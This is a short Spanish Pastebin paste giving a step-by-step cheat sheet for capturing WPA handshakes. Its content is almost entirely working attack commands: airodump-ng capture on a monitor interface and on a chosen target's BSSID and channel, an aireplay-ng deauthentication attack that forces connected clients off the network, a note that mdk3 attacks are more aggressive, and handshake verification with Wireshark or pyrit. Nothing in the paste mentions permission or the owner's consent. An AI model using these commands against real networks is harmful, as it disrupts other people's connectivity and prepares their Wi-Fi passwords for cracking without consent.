Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Corriendo airodump en general:
- airodump-ng -w capturas mon0
- - los ficheros salvados se llamarán capturas
- - mon0 es la interfaz monitor de la placa que usen para auditar
- Corriendo airodump en canal y objetivo específico:
- airodump-ng --bssid macdelobjetivo -w fibertelXXX -c canal mon0
- Desautenticando clientes conectados que aparezcan en airodump-ng
- aireplay-ng -0 0 -a macdelobjetivo -c macdelcliente mon0
- Cuando aparezca arriba en la terminal que corre airodump-ng >>> WPA Handshake ya está capturado.
- Los ataques mdk3 son más agresivos, pero si están relativamente cerca del objetivo seguro lo consiguen sin problemas.
- Como saber si tienen un buen handshake? Abren el archivo .cap con wireshark y en la búsqueda filtran con las palabras EAPOL o usando pyrit en la terminal:
- pyrit -r /ruta/handshake/captura.cap analyze
Advertisement
Add Comment
Please, Sign In to add comment